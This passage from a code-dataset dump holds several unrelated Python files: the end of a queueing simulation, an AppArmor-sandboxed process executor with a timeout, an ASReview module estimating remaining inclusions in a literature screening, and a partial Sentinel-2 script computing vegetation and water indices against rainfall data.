times):\n Globals.cur_time = 0\n Statistics.wait_time = 0.0\n Statistics.wait_area = 0.0\n Statistics.usage_time = 0.0\n customers = []\n windows = []\n for i in range(0, Globals.window_number):\n # 创建窗口\n windows.append(Window(id=i))\n\n time = 0\n for i in range(0, Globals.max_cus):\n # 创建所有顾客\n start_time = time + float(np.random.poisson(Globals.mean_arrive_time * 10)) / 10\n time = start_time\n # start_time = float(np.random.exponential(Globals.mean_arrive_time))\n # duration = -Globals.mean_serve_time * np.log(float(np.random.randint(1, 11) / 10))\n duration = float(np.random.exponential(Globals.mean_serve_time))\n customers.append(Request(arrive_time=start_time, duration=duration))\n\n if Globals.debug:\n print(\"准备工作完毕\")\n print(\"已经创建%d个窗口\" % len(windows))\n print(\"已经创建%d个顾客\" % len(customers))\n for i in customers:\n print(\" %d-客户:到达时间%f:服务时间%f\" % (i.get_id(), i.get_arrive_time(), i.get_duration()))\n\n # 创建控制器\n controller = Controller(outdoors=customers, windows=windows)\n controller.run()\n a = Statistics.wait_time / Globals.max_cus\n b = Statistics.wait_area / Globals.window_number / Globals.cur_time\n c = Statistics.usage_time * 100 / Globals.cur_time / Globals.window_number\n print(\"%f-第%d遍模拟完成\\n\" % (Globals.cur_time, k))\n sumA += a\n sumB += b\n sumC += c\n\n print(\"平均等待时间=%f,队列平均顾客数=%f,服务器利用率=%d%%\" % (sumA / times, sumB / times, sumC / times))\nexit(0)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"641756650","text":"import subprocess\nfrom apparmor import AppArmorSecProfile, FileSystemRestriction\nfrom utils import copy_files, get_temp_dir\nimport os\nimport time\n\n\nclass SafeExecutor:\n def __init__(self, executable_path: str, read_only_access: list = None, write_exec_access: list = None):\n self._executable = executable_path\n self._read_only_access = read_only_access or []\n self._write_exec_access = write_exec_access or []\n self._temp_dir = get_temp_dir()\n self._apparmor_profile = AppArmorSecProfile(self._executable)\n\n def configure(self):\n for path in self._read_only_access:\n self._apparmor_profile.add_fs_restriction(FileSystemRestriction(path, \"r\", True))\n for path in self._write_exec_access:\n # Dir itself should not have write permissions\n self._apparmor_profile.add_fs_restriction(FileSystemRestriction(path, \"rix\", False))\n self._apparmor_profile.add_fs_restriction(FileSystemRestriction(path, \"wrix\", False))\n self._apparmor_profile.write_profile_and_update_app_armor()\n\n def safe_execute(self, files: list = None, new_files: list = None, argv: list = None, stdin: str = None,\n timeout: int = 60):\n \"\"\"\n :param runnable: The main run file. ie, \"/sbin/python\".\n :param files: List of files to be copied to working directory.\n :param new_files: List of touples (name, bytes) of files to be created.\n :param argv: List of rgs to be passed to the runnable. Usually a name of a file from 'files' or 'new_files'.\n :param stdin: Input (str) to be passed to the created process\n :param timeout: Timeout which the proccess will get terminated after in SECONDS.\n :return: (return_code, stdout, stderr)\n \"\"\"\n files = files or []\n new_files = new_files or []\n argv = argv or []\n\n copy_files(files, self._temp_dir)\n for file_name, content in new_files:\n with open(os.path.join(self._temp_dir, file_name), \"wb\") as f:\n f.write(content)\n\n command_line = [self._executable]\n command_line.extend(argv)\n if stdin:\n stdin = stdin.encode('utf-8')\n\n process = subprocess.Popen(\n command_line, cwd=self._temp_dir,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n )\n HungProcessKiller(process, timeout).start()\n\n stdout, stderr = process.communicate(stdin)\n return process.returncode, stdout, stderr\n\n\nclass HungProcessKiller:\n def __init__(self, process: subprocess.Popen, timeout: int):\n self._process = process\n self._timeout = timeout\n\n def start(self):\n timeout_start = time.time()\n while time.time() < timeout_start + self._timeout:\n if self._process.poll() is not None:\n # Process Has finished execution\n return\n time.sleep(0.5)\n\n if self._process.poll() is None:\n self._process.kill()","sub_path":"executer.py","file_name":"executer.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"531572033","text":"import json\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.optimize import minimize\n\nfrom asreview import ASReviewData\nfrom asreview.analysis import Analysis\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.models import get_model\nfrom asreview.balance_strategies import get_balance_model\nfrom asreview.feature_extraction import get_feature_model\nfrom asreview.state import open_state\n\nfrom asreviewcontrib.simulation.exponential_tail import ExpTailNorm\nfrom argparse import ArgumentParser\nfrom asreviewcontrib.simulation.download import optimize_distribution\n\n\nclass ErrorEntryPoint(BaseEntryPoint):\n description = \"Estimate the number of remaining inclusions.\"\n\n def __init__(self):\n super(ErrorEntryPoint, self).__init__()\n from asreviewcontrib.simulation.__init__ import __version__\n from asreviewcontrib.simulation.__init__ import __extension_name__\n\n self.version = __version__\n self.extension_name = __extension_name__\n\n def execute(self, argv):\n\n parser = _parse_args()\n arg_dict = vars(parser.parse_args(argv))\n\n state_fp = arg_dict[\"state_path\"]\n data_fp = arg_dict[\"data_path\"]\n output = arg_dict[\"output\"]\n\n optimization_fp = arg_dict[\"optimization_path\"]\n if optimization_fp is None:\n optimization_fp = Path(\"output\", \"optimization.json\")\n\n data_dir = Path(arg_dict[\"data_path\"]).parent\n cache_fp = arg_dict[\"cache_path\"]\n opt_results = get_opt_results(optimization_fp, data_dir, cache_fp)\n error_data = self.error_estimate(state_fp, data_fp, opt_results)\n if output is None:\n self.plot_results(error_data)\n else:\n with open(output, \"w\") as f:\n json.dump(error_data, f)\n\n def error_estimate(self, state_fp, data_fp, opt_results):\n\n as_data = ASReviewData.from_file(data_fp)\n\n labels = as_data.labels\n inclusion_est = []\n prob_finished = []\n cur_included = []\n perc_reviewed = []\n with open_state(state_fp) as state:\n settings = state.settings\n feature_model = get_feature_model(\n settings.feature_extraction,\n **settings.feature_param)\n\n X = feature_model.fit_transform(\n as_data.texts, as_data.headings, as_data.bodies,\n as_data.keywords\n )\n n_queries = state.n_queries()\n model = get_model(settings.model, **settings.model_param)\n balance_model = get_balance_model(settings.balance_strategy,\n **settings.balance_param)\n\n n_total_inclusions = len(np.where(labels == 1)[0])\n for query_i in range(n_queries):\n try:\n train_idx = state.get(\"train_idx\", query_i=query_i)\n pool_idx = state.get(\"pool_idx\", query_i=query_i)\n except KeyError:\n continue\n n_inc, p_all = estimate_inclusions(\n train_idx, pool_idx, X, labels,\n opt_results, model, balance_model)\n# print(n_inc, np.sum(labels[train_idx]), np.sum(labels), p_all)\n inclusion_est.append(int(n_inc))\n prob_finished.append(p_all)\n cur_included.append(int(np.sum(labels[train_idx])))\n perc_reviewed.append(100*len(train_idx)/len(labels))\n\n error_data = {\n \"inclusion_est\": inclusion_est,\n \"prob_finished\": prob_finished,\n \"cur_included\": cur_included,\n \"perc_reviewed\": perc_reviewed,\n \"n_total_inclusions\": n_total_inclusions\n }\n return error_data\n\n def plot_results(self, error_data):\n perc_reviewed = error_data[\"perc_reviewed\"]\n inclusions_est = error_data[\"inclusion_est\"]\n prob_finished = error_data[\"prob_finished\"]\n cur_included = error_data[\"cur_included\"]\n n_total_inclusions = error_data[\"n_total_inclusions\"]\n\n plt.xlabel(\"% reviewed\")\n plt.ylabel(\"Number of inclusions\")\n plt.plot(perc_reviewed, inclusions_est, label=\"estimate\")\n plt.plot(perc_reviewed, cur_included, label=\"found\")\n plt.legend(loc=\"lower right\")\n plt.show()\n\n plt.xlabel(\"% reviewed\")\n plt.plot(perc_reviewed, prob_finished, label=\"Estimate @100%\")\n plt.plot(perc_reviewed, np.array(cur_included)/n_total_inclusions,\n label=\"Fraction of inclusions found\")\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\ndef _parse_args():\n parser = ArgumentParser(prog=\"asreview error\")\n\n parser.add_argument(\n \"state_path\",\n type=str,\n help=\"Path to state/log file.\"\n )\n parser.add_argument(\n \"data_path\",\n type=str,\n help=\"Path to data file corresponding to the state file.\"\n )\n parser.add_argument(\n \"--cache_path\",\n type=str,\n default=None,\n help=\"Path to result cache.\"\n )\n parser.add_argument(\n \"--data_dir\",\n type=str,\n default=\"data\",\n help=\"Directory to store the datasets for optimization.\"\n )\n parser.add_argument(\n \"--optimization_path\",\n type=str,\n default=None,\n help=\"Path to optimization file with optimal parameter(s) over \"\n \"multiple datasets.\"\n )\n parser.add_argument(\n \"-o\", \"--output\",\n type=str,\n default=None,\n help=\"Path to storing the results of the error estimation.\"\n \" If not supplied, plot the results instead.\")\n return parser\n\n\ndef get_opt_results(optimization_fp, data_dir, cache_fp):\n optimization_fp = Path(optimization_fp)\n\n if not optimization_fp.is_file():\n print(\"Optimization path does not exist yet, computing optimum.\")\n if len(str(optimization_fp.parent)):\n os.makedirs(optimization_fp.parent, exist_ok=True)\n if cache_fp is None:\n cache_fp = Path(\"output\", \"cache.pkl\")\n if len(str(cache_fp.parent)):\n os.makedirs(cache_fp.parent, exist_ok=True)\n optimize_distribution(cache_fp, optimization_fp, data_dir=data_dir)\n\n with open(optimization_fp, \"r\") as f:\n opt_results = json.load(f)\n return opt_results\n\n\ndef discrete_norm_dist(dist, train_percentage, bins):\n norm_cdf = dist.cdf(bins)\n norm_pdf = train_percentage*(norm_cdf[1:]-norm_cdf[:-1])\n norm_hist = norm_pdf/norm_pdf.sum()\n return norm_hist/(bins[1]-bins[0])\n\n\ndef percentage_found(norm_opt_cum_df, train_percentage, bins, mu, sigma):\n normalized_bins = (bins-mu)/sigma\n x_cum = norm_opt_cum_df[0]\n y_cum = norm_opt_cum_df[1]\n d_cum = y_cum[1]-y_cum[0]\n\n prob_found = 0\n for i_bin in range(len(train_percentage)):\n bin_start = normalized_bins[i_bin]\n bin_end = normalized_bins[i_bin+1]\n\n i_cum_start = np.searchsorted(x_cum, bin_start)\n i_cum_end = np.searchsorted(x_cum, bin_end)\n\n if i_cum_start == len(x_cum):\n continue\n\n y_start = y_cum[i_cum_start] - d_cum\n if i_cum_end == len(x_cum):\n y_end = 1\n else:\n y_end = y_cum[i_cum_end] - d_cum\n\n prob = y_end-y_start\n prob_found += prob*train_percentage[i_bin]\n\n return prob_found\n\n\ndef prob_all_found(min_df, df_pool, mu, sigma):\n df_max = np.max(df_pool)\n df_max_norm = (df_max-mu)/sigma\n\n x_min_df = min_df[0]\n y_min_df = min_df[1]\n\n i_min_df = np.searchsorted(x_min_df, df_max_norm)\n\n if i_min_df == 0:\n return 1.0\n else:\n return 1-y_min_df[i_min_df - 1]\n\n\ndef log_likelihood(train_dist, expected_dist):\n likelihood = 0\n for i_bin in range(len(expected_dist)):\n if train_dist[i_bin]:\n likelihood += train_dist[i_bin] * np.log(expected_dist[i_bin])\n return -likelihood\n\n\ndef corrected_proba(X, y, model, balance_model, train_one_idx, train_zero_idx,\n n_sample=10):\n cor_proba = []\n for _ in range(n_sample):\n if len(train_one_idx) == 1:\n new_train_idx = np.append(train_one_idx, train_zero_idx)\n X_train, y_train = balance_model.sample(X, y, new_train_idx, {})\n model.fit(X_train, y_train)\n correct_proba = model.predict_proba(X[train_one_idx])[0, 1]\n cor_proba.append(correct_proba)\n continue\n\n for i_rel_train in range(len(train_one_idx)):\n new_train_idx = np.append(np.delete(train_one_idx, i_rel_train),\n train_zero_idx)\n X_train, y_train = balance_model.sample(X, y, new_train_idx, {})\n model.fit(X_train, y_train)\n correct_proba = model.predict_proba(X[train_one_idx[i_rel_train]])[0, 1]\n cor_proba.append(correct_proba)\n\n return np.array(cor_proba)\n\n\ndef estimate_inclusions(train_idx, pool_idx, X, y, opt_results, model,\n balance_model):\n\n X_train, y_train = balance_model.sample(X, y, train_idx, {})\n\n model.fit(X_train, y_train)\n proba = model.predict_proba(X)[:, 1]\n df_all_corrected = -np.log(1/proba-1)\n\n train_one_idx = train_idx[np.where(y[train_idx] == 1)[0]]\n train_zero_idx = train_idx[np.where(y[train_idx] == 0)[0]]\n\n correct_one_proba = corrected_proba(X, y, model, balance_model,\n train_one_idx,\n train_zero_idx)\n\n df_one_corrected = -np.log(1/correct_one_proba-1)\n df_train_corrected = df_all_corrected[train_idx]\n df_train_zero = df_all_corrected[train_zero_idx]\n df_pool = df_all_corrected[pool_idx]\n\n df_all = np.concatenate((df_all_corrected, df_one_corrected))\n h_min = np.min(df_all)\n h_max = np.max(df_all)\n h_range = (h_min, h_max)\n n_bins = 40\n\n hist, bin_edges = np.histogram(df_one_corrected, bins=n_bins,\n range=h_range, density=True)\n hist_all, _ = np.histogram(df_all_corrected, bins=n_bins, range=h_range,\n density=False)\n hist_pool, _ = np.histogram(df_pool, bins=n_bins, range=h_range,\n density=False)\n hist_train_zero, _ = np.histogram(df_train_zero, bins=n_bins, range=h_range,\n density=False)\n hist_train_one, _ = np.histogram(df_one_corrected, bins=n_bins, range=h_range,\n density=False)\n hist_train, _ = np.histogram(df_train_corrected, bins=n_bins,\n range=h_range, density=False)\n\n perc_train = (hist_train_zero + hist_train_one/10 + 0.000001)/(\n hist_train_zero + hist_train_one/10 + hist_pool + 0.000001)\n\n def guess_func(x):\n dist = ExpTailNorm(*x, *opt_results[\"extra_param\"])\n corrected_dist = discrete_norm_dist(dist, perc_train, bin_edges)\n return log_likelihood(hist, corrected_dist)\n\n mu_range = h_range\n est_sigma = np.sqrt(np.var(df_one_corrected))\n sigma_range = (0.7*est_sigma, 1.3*est_sigma)\n x0 = np.array((np.average(df_one_corrected), est_sigma))\n\n minim_result = minimize(fun=guess_func, x0=x0,\n bounds=[mu_range, sigma_range])\n\n param = minim_result.x\n est_true_dist = ExpTailNorm(*param, *opt_results[\"extra_param\"])\n\n est_found_dist = discrete_norm_dist(est_true_dist, perc_train, bin_edges)\n\n perc_found = percentage_found(opt_results[\"cum_df\"], perc_train, bin_edges,\n param[0], param[1])\n\n p_all_found = prob_all_found(\n opt_results[\"min_df\"], df_pool, param[0], param[1])\n return np.sum(y[train_idx])/perc_found, p_all_found\n","sub_path":"asreviewcontrib/simulation/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":11805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"577229933","text":"#!/usr/bin/env python\n# coding: utf-8\n# パッケージのインストール&インポート gdal\n#gdalによるNDVI等の計算と出力 https://qiita.com/t-mat/items/24073d8494a7427c0ee1\n#\nimport gc\nimport math\nfrom osgeo import gdal,gdalconst\nfrom dateutil.parser import parse\nfrom osgeo import gdal_array\nfrom osgeo import osr \nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport rasterio\nfrom rasterio import plot\nfrom rasterio.plot import show\nfrom rasterio.mask import mask\nimport glob\nimport geopandas as gpd\n# matplotlibで時系列図を作成するときには以下をインポートします\nfrom pandas.plotting import register_matplotlib_converters\n# これを登録しておきます.\nregister_matplotlib_converters()\n# sklearn(scikit-learn)は機械学習関連のライブラリーです.インポートします.\nfrom sklearn import linear_model\nimport folium\nimport matplotlib.cm as cm\n# datetimeは日時データを処理する際に便利なメソッドです.インポートします.\nfrom datetime import date, datetime, timedelta\n#import datetime\nimport csv\n# 有意検定をするためにscipyのstatsというメソッドをインポートします.\nimport scipy.stats as stats\n#%precision 3\n#%matplotlib inline\n\n#area_name = 'hitoyoshi'\narea_name = 'nagahama1'\ndirect_name = '/home/twatanabe/senti/'\nfilename = \"kohoku_AOI1_clip_paddy\" # 長浜\ninput = direct_name+area_name+'/INPUT/'\noutput = direct_name+area_name+'/OUTPUT/'\nndpath = output+'IMAGE/NDVI/'\nnwpath = output+'IMAGE/NDWI/'\nnspath = output+'IMAGE/NDSI/'\ngspath = output+'IMAGE/GSI/'\nshpath = input+'SHP/'\noutpath = output+'RESULT/'\ndirect = input+'MET/'\n# inputデータ\nin_file = area_name+\"_data1.csv\" # 元の気象データ\ninput_shp = shpath + filename+'.shp' # 切り出し用のshpファイル\ndata_path = input+'/DATA/' # オリジナルのセンチネルデータ\n# outputデータ\nstrFile = outpath+filename+\"_time_series_img_all.jpg\"\nmerge_file = outpath+filename+\"_merge.csv\"\ncorr_file = outpath+filename+\"_corr.csv\"\ndesc_file = outpath+filename+\"_desc.csv\"\nprecFile = outpath+filename+\"_time_series_prec_img.jpg\"\nprecviFile = outpath+filename+\"_time_series_prec_vi_img.jpg\"\nindexFile = outpath+filename+\"_time_series_index_img.jpg\"\nplotFile = outpath+filename+\"_time_series_plot_img.jpg\"\n\n#----------------------------フォルダが存在しない場合に作成する。\ndef makepath(path):\n if not os.path.exists(path):\n os.makedirs(path) \n#----------------------------NDVI\n# Define a function to calculate NDVI using band arrays for red, NIR bands\ndef calNDVI(r_band,nir_band):\n nir = nir_band.astype(np.float32)\n red = r_band.astype(np.float32)\n ndvi=np.where(\n (nir+red)==0.,\n 0,(nir-red)/(nir+red))\n return ndvi\n#----------------------------NDWI 水域\ndef calNDWI(lir_band,r_band):\n lir = lir_band.astype(np.float32)\n red = r_band.astype(np.float32)\n ndwi=np.where(\n (lir+red)==0., \n 0,(red-lir)/(red+lir))\n return ndwi\n#----------------------------NDSI\ndef calNDSI(lir_band,nir_band):\n lir = lir_band.astype(np.float32)\n nir = nir_band.astype(np.float32)\n ndsi=np.where(\n (lir+nir)==0., \n 0,(lir-nir)/(lir+nir))\n return ndsi\n#----------------------------GSI\ndef calGSI(b_band,g_band,r_band):\n b = b_band.astype(np.float32)\n g = g_band.astype(np.float32)\n r = r_band.astype(np.float32)\n gsi=np.where(\n (b+g+r)==0., \n 0,(r-b)/(b+g+r))\n return gsi\n#---------------------------作成データ保存\ndef outputGeotifSingle(src,epgs,band1,path):\n tfw=src.GetGeoTransform()\n dtype = gdal.GDT_Float32\n band = 1\n width=src.RasterXSize\n height=src.RasterYSize\n output = gdal.GetDriverByName('GTiff').Create(path, width, height, band, dtype)\n output.SetGeoTransform(tfw)\n crs = osr.SpatialReference()\n crs.ImportFromEPSG(epgs)\n output.SetProjection(crs.ExportToWkt())\n output.GetRasterBand(1).WriteArray(band1)\n output.FlushCache()\n output=None\n#-----------------------タイトル、平均リスト合計\ndef dataInfo(data_mean_list, data):\n data_mean = np.nanmean(data)\n data_mean_list = np.append(data_mean_list,data_mean)\n return data_mean_list, data_mean \n\n#-----------------------アメダスデータの読み込み\n# 気象庁アメダスの気温の時系列データを読み込んで,\n# DataFrameに割り当てる関数\n # ここがポイント!\n # pandasのread_csvというメソッドでcsvファイルを読み込みます.\n # 引数として,\n # [0]入力ファイル名\n # [1]エンコーディング\n # [2]読み飛ばす行数,\n # [3]column名\n # [4]datetime型で読み込むcolumn名\n # [5]indexとするcolumn名\n # を与える\ndef readamedas(filename,skipline):\n amedas = pd.read_csv(\n filename, \n encoding=\"Shift_JIS\", \n skiprows=skipline, \n# header=None, \n names=[\"Date\",\"Prec\",\"dummy1\",\"dummy2\"],\n index_col='Date',\n# parse_dates={'datetime':['date']}, \n parse_dates=True, \n )\n return amedas\n#def 5.############################################\n# 2つの時系列データから時系列図を作成する関数\ndef timeseries(df,date1,name1,name2,filename):\n # dfのインデックス(時間)をXとする\n# X=df.index\n X=df.loc[:,[date1]].values\n print(df.loc[:,[date1]].values)\n # dfのname1列を指定してデータを取り出し,numpy配列で値をY1に与える.\n Y1=df.loc[:,[name1]].values\n # dfのname1列を指定してデータを取り出し,numpy配列で値をY2に与える.\n Y2=df.loc[:,[name2]].values\n # 時系列図の大きさを指定\n plt.figure(figsize=(20, 10))\n # 1つ目(name1)のグラフを1行1列の1つ目に\n ax1=plt.subplot(1,1,1)\n # 2つ目(name2)のグラフのx軸を共有する\n ax2=ax1.twinx()\n # 1つ目(name1)の時系列 \n ax1.plot(X,Y1,color='blue',label=name1)\n # 2つ目(name2)の時系列 \n ax2.plot(X,Y2,color='red',label=name2)\n # グラフのタイトル\n ax1.set_title(\"Timeseries:\"+name1+\" and \"+name2)\n # x軸のラベル\n ax1.set_xlabel('Time')\n # y軸(左側の第1軸)のラベル\n ax1.set_ylabel('Index')\n # y軸(右側の第2軸)のラベル\n ax2.set_ylabel('Amount of Precipitation [mm/hr]')\n # 1つ目(name1)の凡例(左上に置く) \n ax1.legend(loc='upper left')\n # 2つ目(name1)の凡例(右上に置く)\n ax2.legend(loc='upper right')\n # 保存するファイル名\n plt.savefig(filename)\n # 図を閉じる\n plt.close()\n return\n#-----------------------散布図\n# 2つの時系列データから散布図を作成する関数\ndef scatter(df,name1,name2,filename):\n # ここがポイント!\n # scikit-learnの線形回帰モデルのクラスを呼び出す\n clf = linear_model.LinearRegression()\n # 説明変数Xにはname1を割り当てる(numpy配列)\n X=df.loc[:,[name1]].values\n # 説明変数Yにはname2を割り当てる(numpy配列)\n Y=df.loc[:,[name2]].values\n # ここがポイント!\n # Y=aX+bの予測モデルを作成する\n clf.fit(X,Y)\n # ここがポイント!\n # 回帰係数a\n slope=clf.coef_\n # ここがポイント!\n # 切片b\n intercept=clf.intercept_\n # ここがポイント!\n # 決定係数R2(回帰直線の当てはまりの良さ)\n r2=clf.score(X,Y)\n # 文字列\"Y=aX+b (R2=r2)\"\n equation=\" y = \"+str('{:.1f}'.format(slope[0][0]))+\" x +\"+str('{:.0f}'.format(intercept[0]))+\" (R2=\"+str('{:.2f}'.format(r2))+\")\"\n print(equation)\n # 相関係数とその有意確率p-値を計算\n corrcoef, pvalue = stats.pearsonr(np.ravel(X),np.ravel(Y))\n # 散布図の大きさを指定\n plt.figure(figsize=(8, 8))\n # 散布図のプロット\n plt.plot(X, Y, 'o')\n # ここがポイント!\n # 散布図上に回帰直線を引く\n plt.plot(X, clf.predict(X))\n # 文字列\"Y=aX+b (R2=r2)\"を図の左上に置く\n plt.text(np.nanmin(X), np.nanmax(Y), equation)\n # グラフのタイトル\n plt.title(\"Scatter diagram:\"+name1+\" and \"+name2)\n # x軸のラベル\n plt.xlabel(name1)\n# plt.xlim(-1, 1) #y軸の最小と最大を決める\n # y軸のラベル\n plt.ylabel(name2)\n# if os.path.isfile(plotFile):\n# os.remove(plotFile) # Opt.: os.system(\"rm \"+strFile)\n plt.savefig(filename)\n# plt.ylim(-1, 1) #y軸の最小と最大を決める\n # 図を閉じる\n plt.close()\n return corrcoef, pvalue\n\n# ディレクトリが存在しない場合、ディレクトリを作成する \nmakepath(ndpath)\nmakepath(nwpath)\nmakepath(nspath)\nmakepath(gspath)\nmakepath(outpath)\nmakepath(output)\n\n# データ入力 (まとめて読込)\ndata_files = glob.glob(data_path+'*V.tif')\ndata_files.sort()\n\n# シェープファイル読込(encoding='SHIFT-JIS'とすることで日本語データにも対応)\ndf_shp = gpd.read_file(input_shp,encoding='SHIFT-JIS')\nprint(\"input_shp:\",input_shp)\n\n#----------------------グラフ用リストの初期化\nndvi_mean_list = np.zeros(0)\nndwi_mean_list = np.zeros(0)\nndsi_mean_list = np.zeros(0)\ngsi_mean_list = np.zeros(0)\ndata_title_list = np.zeros(0)\n\n# ----------------------画像範囲設定\nlen_num = len(data_files)\ncol = int(4)\nraw =math.ceil(len_num)\nprint(\"raw:\",raw)\nmy_dpi = 50\nim_col = 148 * (col*2*9)\nim_raw = 384 *(col*1)\n\n\n#fig = plt.figure(figsize=(18, image_len))\n#fig = plt.figure(figsize=(25, 200))\nplt.figure(figsize=(int(im_raw/my_dpi),int(im_col/my_dpi)), dpi = my_dpi)\nplt.clf()\nprint(mpl.matplotlib_fname())\n\nj=0\nnum=1\n#-----------画像の切り出し\n#for i in range(10):\nfor i in range(len_num):\n input_raster = data_files[i]\n output_raster = data_files[i][:-4]+'_clip.tif'\n print(input_raster)\n print(output_raster)\n # gdal.Warp(output_raster, input_raster, format = 'GTiff', cutlineDSName = input_shp, dstNodata = np.nan)\n\n\n#----read red datra--------\n src = gdal.Open(output_raster, gdal.GA_ReadOnly)\n src.RasterXSize # 水平方向ピクセル数\n src.RasterYSize # 鉛直方向ピクセル数\n src.RasterCount # バンド数\n\n # 青、緑、赤、NIR、SWIR(よく使うバンド)はそれぞれ B2, B3, B4, B8, B12(またはB11)に相当\n # band_name = ['B2', 'B3', 'B4', 'B8', 'B12']\n barr = src.GetRasterBand(1).ReadAsArray() # 第1バンド blue\n garr = src.GetRasterBand(2).ReadAsArray() # 第2バンド green\n rarr = src.GetRasterBand(3).ReadAsArray() # 第3バンド red\n narr = src.GetRasterBand(4).ReadAsArray() # 第8バンド 近赤外\n swarr = src.GetRasterBand(5).ReadAsArray() # 第12バンド 短波長\n\n#----get EPGS iinfo---------\n proj = int(osr.SpatialReference(wkt=src.GetProjection()).GetAttrValue('AUTHORITY',1))\n# print('proj_type=',type(proj),'proj=',proj)\n\n#-- Call the ndvi(),swvi() function on red, NIR bands\n ndvi = calNDVI(rarr, narr)\n ndwi = calNDWI(swarr, rarr)\n ndsi = calNDSI(swarr, narr)\n gsi = calGSI(barr, garr, rarr)\n\n#---calc ndvi ndwi mean----- \n ndvi_mean_list, ndvi_mean = dataInfo(ndvi_mean_list, ndvi)\n ndwi_mean_list, ndwi_mean = dataInfo(ndwi_mean_list, ndwi)\n ndsi_mean_list, ndsi_mean = dataInfo(ndsi_mean_list, ndsi)\n gsi_mean_list, gsi_mean = dataInfo(gsi_mean_list, gsi)\n\n#---get image date------\n# data_title = data_files[i][-31:-23]\n data_title = input_raster[-26:-18]\n data_title_list = np.append(data_title_list, data_title)\n print(num,data_title,'ndvi_mean=',ndvi_mean,'ndwi_mean=',ndwi_mean,'ndsi_mean=',ndsi_mean,'gsi_mean=',gsi_mean)\n\n#-- Output NDVI data---- \n outputGeotifSingle(src,proj,ndvi,ndpath+filename+'_'+data_title+'_ndvi.tif')\n outputGeotifSingle(src,proj,ndwi,nwpath+filename+'_'+data_title+'_ndwi.tif')\n outputGeotifSingle(src,proj,ndsi,nspath+filename+'_'+data_title+'_ndsi.tif')\n outputGeotifSingle(src,proj,gsi,gspath+filename+'_'+data_title+'_gsi.tif')\n\n#---Draw Images ---\n num+=1\n print(\"num:\",num)\n # 色の情報(https://matplotlib.org/tutorials/colors/colormaps.html)\n j+=1\n plt.subplot(raw,col,j);plt.imshow( ndvi, clim=(-1, 1), cmap=cm.jet, interpolation='nearest')\n plt.colorbar()\n plt.xlabel(data_title+'_ndvi', fontsize=30) #x軸に名前をつける\n j+=1\n plt.subplot(raw,col,j);plt.imshow( ndwi, clim=(-1, 1), cmap=cm.jet, interpolation='nearest')\n plt.colorbar()\n plt.xlabel(data_title+'_ndwi', fontsize=30)\n j+=1\n plt.subplot(raw,col,j);plt.imshow( ndsi, clim=(-1, 1), cmap=cm.jet, interpolation='nearest')\n plt.colorbar() \n plt.xlabel(data_title+'_ndsi', fontsize=30)\n j+=1 \n plt.subplot(raw,col,j);plt.imshow( gsi, clim=(-1, 1), cmap=cm.jet, interpolation='nearest')\n plt.colorbar()\n plt.xlabel(data_title+'_gsi', fontsize=30)\n plt.tight_layout()\n\n##----画像の保存\n#plt.show()\nplt.ioff()\nif os.path.isfile(strFile):\n os.remove(strFile) # Opt.: os.system(\"rm \"+strFile)\nplt.savefig(strFile, dpi=my_dpi)\nplt.cla()\n#plt.tight_layout()\n#plt.show()\n\n#----------------------------------------------------\n#気象データの読み込み  ここからグラフとcsvの作成と相関係数を求める。\n# 降水量の合計日数(移動合計)\ninterval3 =3\ninterval4 =4\ninterval5 =5\ninterval6 =6\ninterval7 =7\ninterval30 =30\n\n#気象データ読み込み+ヘッダ変更\nskipline1=5\ndf = readamedas(direct+in_file,skipline1)\n# DataFrame(amedas)の中のdummy1とdummy2の列を削除する.\ndf=df.drop(['dummy1','dummy2'],axis=1)\nprint(\"df\",df)\n\n# パラメータ設定\ndate_time = \"Date\"\nprec = \"Prec\"\nprec3 = \"Prec_3days\"\nprec4 = \"Prec_4days\"\nprec5 = \"Prec_5days\"\nprec6 = \"Prec_6days\"\nprec7 = \"Prec_7days\"\nprec30 = \"Prec_30days\"\nname_NDVI = \"NDVI\"\nname_NDWI = \"NDWI\"\nname_NDSI = \"NDSI\"\nname_GSI = \"GSI\"\n\n# 年月日を日付に変換、フォーマットもint型にする。\n#df['年月日'] = pd.to_datetime(df['年月日'])\n#df['年月日'] = pd.Series(df['年月日'].dt.strftime('%Y%m%d'), dtype='str')\ndf[prec] = pd.Series(df[prec], dtype='float') #floatに変換 \n# 日降水量の移動合計を追加 (移動平均のような)\ndf_sum3 = df[prec].rolling(window=interval3).sum()\ndf_sum4 = df[prec].rolling(window=interval4).sum()\ndf_sum5 = df[prec].rolling(window=interval5).sum()\ndf_sum6 = df[prec].rolling(window=interval6).sum()\ndf_sum7 = df[prec].rolling(window=interval7).sum()\ndf_sum30 = df[prec].rolling(window=interval30).sum()\n## 移動合計データをdf リストに結合\ndf[prec3] = df_sum3\ndf[prec4] = df_sum4\ndf[prec5] = df_sum5\ndf[prec6] = df_sum6\ndf[prec7] = df_sum7\ndf[prec30] = df_sum30\n\n#--- NDVI等の計算結果をpandasでリスト化\nct_csv = np.array([data_title_list, ndvi_mean_list, ndwi_mean_list, ndsi_mean_list, gsi_mean_list]).T #行列を転置\nvi_data = pd.DataFrame(ct_csv,columns =[date_time, name_NDVI ,name_NDWI, name_NDSI,name_GSI]) #タイトル行を追加 \n#print(\"vidata\",vi_data)\n# 年月日を日付に変換、フォーマットもint型にする。\nvi_data[date_time] = pd.to_datetime(vi_data[date_time])\n#vi_data = vi_data.set_index([date_time]) # index keyの設定\n# ndvi等のフォーマットもfloat型にする。\nvi_data[name_NDVI] = pd.Series(vi_data[name_NDVI], dtype='float') #floatに変換 \nvi_data[name_NDWI] = pd.Series(vi_data[name_NDWI], dtype='float') #floatに変換\nvi_data[name_NDSI] = pd.Series(vi_data[name_NDSI], dtype='float') #floatに変換\nvi_data[name_GSI] = pd.Series(vi_data[name_GSI], dtype='float') #floatに変換\n\n# 同じ日付を抽出 